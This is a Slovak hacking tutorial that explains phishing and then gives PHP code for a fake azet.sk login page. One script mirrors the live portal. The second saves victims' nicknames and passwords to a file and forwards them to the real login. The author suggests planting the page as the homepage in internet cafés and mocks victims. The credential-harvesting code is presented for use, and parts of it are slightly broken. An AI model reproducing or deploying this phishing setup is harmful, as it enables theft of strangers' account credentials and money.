Slovo phishing vzniklo kombináciou slov fishing (rybárčenie) a phreaking (označuje osoby zneužívajúce telefónne linky). Phishing spočíva v krádeži (resp. získaní) citlivých informácií, napr. údajov o platobnej karte alebo mená a heslá k nejakej službe. K nalákaniu sú zneužívané metódy sociálneho inžinierstva.
Typickým súčasným phishingom je podvodný email, ktorý vyzerá ako by bol odoslaný z banky užívateľa. V takomto emaily banka pod nejakou zámienkou (hroziaca zrušením účtu apod.) žiada o overenie totožnosti a ďalších údajov (napr. číslo kreditnej karty, prístupové údaje). Po kliknutí na odkaz v emaily je užívateľovi zobrazená falošná webová stránka, kde vyplní požadované údaje. Následne užívateľ príde o svoje peniaze prevedené z jeho účtu alebo odčerpané z jeho kreditnej karty.
V tomto článku ale nebudeme rozosielať žiadne falošné maily, ale nastavíme niekomu falošnú stránku nejakého portálu (centrum, zoznam, azet) ako domovskú, on vyplní údaje, ktoré sa nám uložia a aby to nebolo nápadne, presmerujeme ho do jeho skutočnej schránky. Lenže ako vytvoriť vernú kópiu stránky, ktorej obsah sa neustále mení (na portáloch bývaju väčinou aj aktuálne správy, reklamy, a rôzne blbosti, ktoré sa každý deň menia).
Ako na to?
Takže po prvé si musíme založiť web na niektorom z freehostingov (musia mať podporu php skriptov). Ďalej by sme mali dobre ovládať HTML a PHP. Pre názornú ukážku si vyberiem portál azet.sk. Ako ale presnú kópiu stránky s jej aktuálnym obsahom? Musíme si celú stránku načítať a zameniť login azetu za náš falošný login:
--- index.php ---
<?
$open=FOpen("http://azet.sk/","r"); // otvoríme súbor na čítanie
$read=FRead($open,filesize("http://azet.sk/")); // prečítame ju a uložíme do premennej read
FClose($open); // zatvoríme súbor
$nahradene=str_replace("http://moje.azet.sk/prihlasenie.phtml?KDE=www.azet.sk%2Findex.phtml%3","login.php",$read); // Nahradíme login súbor azetu za náš za náš súbor
echo $nahradene; // a teraz to celé zobrazíme
?>
--- login.php ---
<?
$open=FOpen("hesla.dat","a"); // otvoríme súbor pre zápis na koniec
FWrite($_POST['nick']." > ".$_POST['heslo']."\n"); // zapíšeme údaje
FClose($open); // zatvoríme súbor
header("location: http://moje.azet.sk/prihlasenie.phtml?KDE=www.azet.sk%2Findex.phtml%3&nick=".$_POST['nick']."&heslo=".$_POST['heslo']); // presmerujeme na skutočný login azetu
?>
Teraz už len stačí nastaviť túto falošnú stránku do niekoľkých internetových kaviarní ako domácu a na výsledok nebude treba dlho čakať. Väčšina ľudí je takí "blbý", že si ani neskontrolujú správnosť adresy a zadajú svoj login a heslo. Ak k phishingu pridáme ešte
bar spoofing, je pre bežného používateľa takmer neodhalitelný.
.::timbulko::.